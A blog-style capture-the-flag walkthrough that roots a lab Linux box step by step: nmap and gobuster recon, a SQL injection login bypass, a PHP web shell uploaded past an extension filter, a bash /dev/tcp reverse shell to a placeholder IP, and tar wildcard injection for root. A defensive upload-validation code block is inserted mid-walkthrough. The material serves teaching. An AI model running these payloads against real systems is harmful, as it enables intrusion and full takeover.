Hard CTF Walkthrough: Complete Guide to Root a Machine (Recon → Exploit → Privilege Escalation)

🧠 Introduction

Capture The Flag (CTF) challenges are one of the best ways to learn real-world cybersecurity and ethical hacking skills. Unlike theoretical learning, CTFs simulate actual vulnerabilities found in production systems.

In this blog, we will walk through a complete hard-level CTF machine, covering every phase:

  • Reconnaissance

  • Enumeration

  • Exploitation

  • Privilege Escalation

  • Root Access

This guide is designed for intermediate to advanced learners who want to sharpen their penetration testing mindset.

We’ll be using tools like:

  • Nmap

  • Gobuster

  • Burp Suite

  • Netcat

🖥️ Machine Overview

  • Difficulty: Hard

  • Target IP: 10.10.10.50

  • OS: Linux

  • Goal: Capture user.txt and root.txt

🔍 Step 1: Reconnaissance

Reconnaissance is the foundation of any successful attack.

🔎 Nmap Scan

nmap -sC -sV -p- -T4 10.10.10.50

📊 Results:

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2
80/tcp   open  http    Apache 2.4.41
443/tcp  open  https   Apache SSL

👉 Key Observations:

  • SSH is open (possible brute-force or key-based access)

  • Web server running (main attack surface)

🌐 Step 2: Web Enumeration

🔎 Visit Website

Open browser:

http://10.10.10.50

👉 You’ll notice:

  • A login panel

  • Likely hidden directories

📂 Directory Bruteforce

gobuster dir -u http://10.10.10.50 -w /usr/share/wordlists/dirb/common.txt

📊 Found:

/admin
/uploads
/api

🔐 Step 3: Login Bypass (Initial Access)

🔎 Intercept Request with Burp Suite

  • Capture login request

  • Send to Repeater

Try payload:

' OR 1=1 --

👉 Result:
✅ Login successful (SQL Injection)

📁 Step 4: File Upload Exploit

Inside /admin, we find file upload functionality.

🔥 Goal:

Upload a reverse shell

🧾 Create PHP Shell

<?php system($_GET['cmd']); ?>

🚫 Problem:

The upload is rejected for files with a .php extension

💡 Bypass Trick:

Rename file:

shell.php.jpg

OR

Use:

shell.phtml

👉 Upload successful!
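As an added example (not part of the original walkthrough or the machine's code), the following Python contrasts a denylist check of the kind defeated above with an allowlist validator that rejects both shell.php.jpg and shell.phtml and also sniffs the file content; the extension sets, magic bytes and function names are my own assumptions.

```python
import os
import re
from typing import Optional

# Extensions the upload endpoint agrees to store (allowlist; assumed).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

# Extensions a PHP-enabled Apache may execute; .phtml is the usual filter gap.
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps"}

# Leading bytes (magic numbers) expected for each allowed type.
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}

NAME_RE = re.compile(r"[a-z0-9_-]{1,64}")


def weak_check(filename: str) -> bool:
    """Denylist of the kind the walkthrough defeats: blocks only a trailing .php."""
    return not filename.lower().endswith(".php")


def hardened_check(filename: str, head: bytes) -> bool:
    """Allowlist the final extension, refuse executable extensions anywhere in the
    name, and confirm the content starts with the magic bytes of that type."""
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) < 2:
        return False                     # no extension at all
    stem, inner, ext = parts[0], parts[1:-1], parts[-1]
    if not NAME_RE.fullmatch(stem):
        return False                     # empty or odd stem (dotfiles, spaces, ...)
    if ext not in ALLOWED_EXTENSIONS:
        return False                     # shell.phtml
    if any(p in EXECUTABLE_EXTENSIONS for p in inner):
        return False                     # shell.php.jpg
    return head.startswith(MAGIC[ext])   # a PHP payload does not look like a JPEG


def stored_name(filename: str, head: bytes, token: str) -> Optional[str]:
    """Name to store the file under: a server-chosen token plus the validated
    extension (never the client's own name), or None if the upload is rejected."""
    if not hardened_check(filename, head):
        return None
    return f"{token}.{filename.rsplit('.', 1)[-1].lower()}"
```

Serving the upload directory with script execution disabled is the complementary control: even a file that slips past the validator is then returned as data, not run.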

💻 Step 5: Gain Reverse Shell

🖥️ Start Listener

nc -lvnp 4444

🌐 Trigger Shell

http://10.10.10.50/uploads/shell.phtml?cmd=bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'

👉 Result:
✅ Reverse shell obtained

🔧 Step 6: Stabilize Shell

python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

🧪 Step 7: Enumeration (Post Exploitation)

Now we dig deeper.

🔎 Check users:

cat /etc/passwd

👉 Found:

user1
developer
root

🔎 Check SUID binaries:

find / -perm -4000 -type f 2>/dev/null

👉 Found an unusual binary:

/usr/bin/custom-backup

⚠️ Step 8: Privilege Escalation (Critical)

Run binary:

/usr/bin/custom-backup

👉 Output:

Backup completed using tar

💡 Exploit Idea:

Tar wildcard injection: the backup runs tar over a directory we can write to using a shell wildcard, so a filename that looks like a tar option is expanded and parsed as one.

🧨 Create malicious file:

echo 'bash -i >& /dev/tcp/YOUR_IP/5555 0>&1' > shell.sh
chmod +x shell.sh

🎯 Exploit:

touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"

🖥️ Start Listener:

nc -lvnp 5555

🚀 Run binary again:

/usr/bin/custom-backup

👉 Result:
🔥 ROOT SHELL OBTAINED

👑 Step 9: Capture Flags

🧾 User Flag:

cat /home/user1/user.txt

🧾 Root Flag:

cat /root/root.txt

🧠 Step 10: Key Learnings

This hard machine teaches critical concepts:

🔥 1. SQL Injection

Login bypass using simple payload

🔥 2. File Upload Vulnerability

Bypassing extension filters

🔥 3. Reverse Shell

Gaining initial access

🔥 4. Privilege Escalation

Using tar wildcard injection

⚡ Pro Tips for Hard CTFs

  • Always enumerate deeply

  • Don’t trust file filters

  • Look for custom binaries

  • Think creatively (not just tools)

  • Read error messages carefully

🚀 Conclusion

This walkthrough demonstrated how a real attacker approaches a system:

👉 Start with recon
👉 Find weak entry point
👉 Gain foothold
👉 Escalate privileges
👉 Take full control

Hard-level CTF machines are not about tools — they are about mindset and persistence.
